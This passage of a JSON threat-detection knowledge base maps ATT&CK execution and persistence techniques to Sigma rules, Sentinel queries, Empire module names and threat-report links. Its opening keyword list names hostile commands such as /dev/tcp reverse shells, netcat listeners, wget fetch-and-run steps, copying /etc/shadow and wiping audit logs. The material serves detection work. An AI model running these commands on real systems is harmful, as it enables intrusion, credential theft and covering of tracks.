", + "cat > /dev/tcp/127.0.0.1/80 < /dev/null", + "ping -c 2 *; grep * /proc/net/arp >/tmp/gx", + "iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;", + "> /var/log/audit/audit.log; rm -f .", + "cp /var/log/audit/audit.log .tmp", + "sh >/dev/tcp/* <&1 2>&1", + "ncat -vv -l -p * <", + "nc -vv -l -p * <", + "< /dev/console | uudecode && uncompress", + "sendmail -osendmail;chmod +x sendmail", + "/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron", + "chmod 666 /var/run/utmp~", + "chmod 700 nscd crond", + "cp /etc/shadow /tmp/.", + " /dev/null 2>&1 && uncompress", + "chmod 700 jp&&netstat -an|grep", + "uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755", + "chmod 700 crond", + "wget http*; chmod +x /tmp/sendmail", + "chmod 700 fp sendmail pt", + "chmod 755 /usr/vmsys/bin/pipe", + "chmod -R 755 /usr/vmsys", + "chmod 755 $opbin/*tunnel", + "chmod 700 sendmail", + "chmod 0700 sendmail", + "/usr/bin/wget http*sendmail;chmod +x sendmail;", + "&& telnet * 2>&1 powershell)", + "references": [ + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", + "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100" + ], + "author": "Florian Roth", + "tags": [ + "attack.execution", + "attack.t1059" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "cmd.exe /c *http://*%AppData%", + "cmd.exe /c *https://*%AppData%" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "High" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "command", + "definition": "Information about commands that can be used through a 
command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer 
programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + 
"https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "http://www.secureworks.com/resources/blog/living-off-the-land/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + 
"https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1060", + "command_list": [ + "Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup|Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell 
Folders\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "powershell/persistence/elevated/registry", + "powershell/persistence/userland/registry" + ], + "commands": [ + { + "command": "Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", + "source": "SysmonHunter - Registry Run Keys / Startup Folder", + "name": "" + }, + { + "command": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup|Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "source": "SysmonHunter - Registry Run Keys / Startup Folder", + "name": "" + }, + { + "command": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "source": "SysmonHunter - Registry Run Keys / Startup Folder", + "name": "" + }, + { + "command": "powershell/persistence/elevated/registry", + 
"source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/userland/registry", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "name": "Registry Run Keys / Startup Folder", + "description": null, + "level": "high", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup|Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders" + } + }, + "file": { + "path": { + "pattern": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" + } + } + }, + { + "type": "file", + "process": { + "cmdline": { + 
"pattern": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" + } + }, + "file": { + "path": { + "pattern": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" + } + } + } + ] + }, + { + "Empire Module": "powershell/persistence/elevated/registry", + "ATT&CK Technique #1": "T1060", + "ATT&CK Technique #2": "", + "Technique": "Registry Run Keys / Start Folder", + "Concatenate for Python Dictionary": "\"powershell/persistence/elevated/registry\": [\"T1060\"]," + }, + { + "Empire Module": "powershell/persistence/userland/registry", + "ATT&CK Technique #1": "T1060", + "ATT&CK Technique #2": "", + "Technique": "Registry Run Keys / Start Folder", + "Concatenate for Python Dictionary": "\"powershell/persistence/userland/registry\": [\"T1060\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14) and(registry_key_path contains \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run*\"or registry_key_path contains \"*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\*Shell Folders\")", + "name": "Registry Run Keys Or Start Folder" + } + ], + "possible_detections": [ + { + "title": "Suspicious RUN Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "experimental", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "references": [ + "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/" + ], + "author": "Florian Roth", + "date": "2019/10/01", + "tags": [ + "attack.persistence", + "attack.t1060" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "Image": [ + "*\\Downloads\\\\*", + "*\\Temporary Internet Files\\Content.Outlook\\\\*", + "*\\Local Settings\\Temporary Internet Files\\\\*" + ], + "TargetObject": 
"*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Software installers downloaded and used by users" + ], + "level": "high" + }, + { + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "status": "experimental", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and poiting to a suspicious folder", + "author": "Florian Roth", + "date": "2018/07/18", + "references": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "TargetObject": "*\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "Details": [ + "C:\\Windows\\Temp\\\\*", + "C:\\ProgramData\\\\*", + "*\\AppData\\\\*", + "C:\\$Recycle.bin\\\\*", + "C:\\Temp\\\\*", + "C:\\Users\\Public\\\\*", + "C:\\Users\\Default\\\\*" + ] + }, + "condition": "selection" + }, + "tags": [ + "attack.persistence", + "attack.t1060", + "capec.270" + ], + "fields": [ + "Image", + "ParentImage" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": "experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "references": [ + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "author": "Florian Roth, Markus Neis", + "tags": [ + "attack.persistence", + "attack.t1060" + ], + "date": "2018/25/08", + "modified": "2019/10/01", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "TargetObject": [ + 
"*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*", + "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\\\*" + ], + "Details": [ + "*C:\\Windows\\Temp\\\\*", + "*\\AppData\\\\*", + "%AppData%\\\\*", + "*C:\\$Recycle.bin\\\\*", + "*C:\\Temp\\\\*", + "*C:\\Users\\Public\\\\*", + "%Public%\\\\*", + "*C:\\Users\\Default\\\\*", + "*C:\\Users\\Desktop\\\\*", + "wscript*", + "cscript*" + ] + }, + "condition": "selection" + }, + "fields": [ + "Image" + ], + "falsepositives": [ + "Software with rare behaviour" + ], + "level": "high" + }, + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + 
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.group-ib.com/blog/cobalt", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + 
"https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + "https://github.com/PowerShellEmpire/Empire", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + { + "technique_id": "T1037", + "command_list": [ + "\\Environment\\UserInitMprLogonScript", + "python/persistence/multi/desktopfile", + "python/persistence/osx/loginhook" + ], + "commands": [ + { + "command": "\\Environment\\UserInitMprLogonScript", + "source": "SysmonHunter - Logon Scripts", + "name": "" + }, + { + "command": "python/persistence/multi/desktopfile", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/persistence/osx/loginhook", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "name": "Logon Scripts", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Environment\\UserInitMprLogonScript" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\Environment\\UserInitMprLogonScript" + } + } + } + ] + }, + { + "Empire Module": "python/persistence/multi/desktopfile", + "ATT&CK Technique #1": "T1037", + "ATT&CK Technique #2": "", + "Technique": "Logon Scripts", + "Concatenate for Python Dictionary": "\"python/persistence/multi/desktopfile\": [\"T1037\"]," + }, + { + "Empire Module": 
"python/persistence/osx/loginhook", + "ATT&CK Technique #1": "T1037", + "ATT&CK Technique #2": "", + "Technique": "Logon Scripts", + "Concatenate for Python Dictionary": "\"python/persistence/osx/loginhook\": [\"T1037\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_command_line contains \"*REG*ADD*HKCU\\\\Environment*UserInitMprLogonScript*\"", + "name": "Logon Scripts" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "experimental", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "references": [ + "https://attack.mitre.org/techniques/T1037/" + ], + "tags": [ + "attack.t1037", + "attack.persistence", + "attack.lateral_movement" + ], + "author": "Tom Ueltschi (@c_APT_ure)", + "falsepositives": [ + "exclude legitimate logon scripts", + "penetration tests, red teaming" + ], + "level": "high" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "exec_selection": { + "ParentImage": "*\\userinit.exe" + }, + "exec_exclusion1": { + "Image": "*\\explorer.exe" + }, + "exec_exclusion2": { + "CommandLine": "*\\netlogon.bat" + }, + "condition": "exec_selection and not exec_exclusion1 and not exec_exclusion2" + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "create_keywords_cli": { + "CommandLine": "*UserInitMprLogonScript*" + }, + "condition": "create_keywords_cli" + } + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "create_selection_reg": { + "EventID": [ + 11, + 12, + 13, + 14 + ] + }, + "create_keywords_reg": { + "TargetObject": "*UserInitMprLogonScript*" + }, + "condition": "create_selection_reg and create_keywords_reg" + } + }, + [ + "4688", + "Process Execution" + ], + [ + 
"4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are 
being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad 
object" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
